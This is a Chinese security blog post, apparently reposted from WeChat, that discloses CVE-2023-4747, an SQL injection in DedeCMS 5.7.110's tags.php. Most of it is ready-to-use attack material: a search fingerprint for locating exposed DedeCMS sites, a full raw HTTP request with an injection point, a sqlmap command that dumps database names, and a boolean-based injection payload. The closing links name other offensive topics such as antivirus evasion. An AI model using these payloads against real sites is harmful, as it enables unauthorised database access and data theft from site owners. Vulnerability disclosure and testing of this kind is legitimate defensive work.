DedeCms | CVE-2023-4747(SQL注入)

2023年9月6日14:45:41评论268 views字数 1388阅读4分37秒阅读模式

免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，WK安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

| 0x01 漏洞介绍

DedeCMS是一个集内容发布、编辑、管理检索等于一体的网站管理系统，是国内第一个开源的内容管理系统。它拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。

该漏洞影响文件/uploads/tags.php 的未知代码。对参数 tag_alias 的操作会导致 sql 注入
| 0x02 影响版本

DedeCMS 5.7.110

| 0x03 特征

app="DedeCMS"

DedeCms | CVE-2023-4747(SQL注入)

| 0x04 漏洞POC

POC：

GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1Host: xxxxsec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417Connection: close
SQLmap：sqlmap.py -u "http://xxxxxxxxx/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU

参考链接

 https://github.com/laoquanshi/cve/blob/main/dedecms%20%20sql%20%20injection

技术交流可加下方wx

DedeCms | CVE-2023-4747(SQL注入)

原文始发于微信公众号（WK安全）：DedeCms | CVE-2023-4747(SQL注入)

左青龙
微信扫一扫

右白虎
微信扫一扫

DedeCms | CVE-2023-4747(SQL注入)

win客户端黑盒挖掘

Mitmproxy解密自签名证书加密流量

红日靶场ATT&CK 1通关攻略

2024护网经验学习（一）

API未授权访问到进入系统

Hack The Box——Perfection笔记

漏洞检查表 :vulnerability-Checklist

前端Js解密小技巧|JS逆向

DarkGPT：基于GPT-4对泄露的数据库执行查询的AI助手

在Windows 11 上红队使用 PE进行AV 规避

发表评论

在线咨询

微信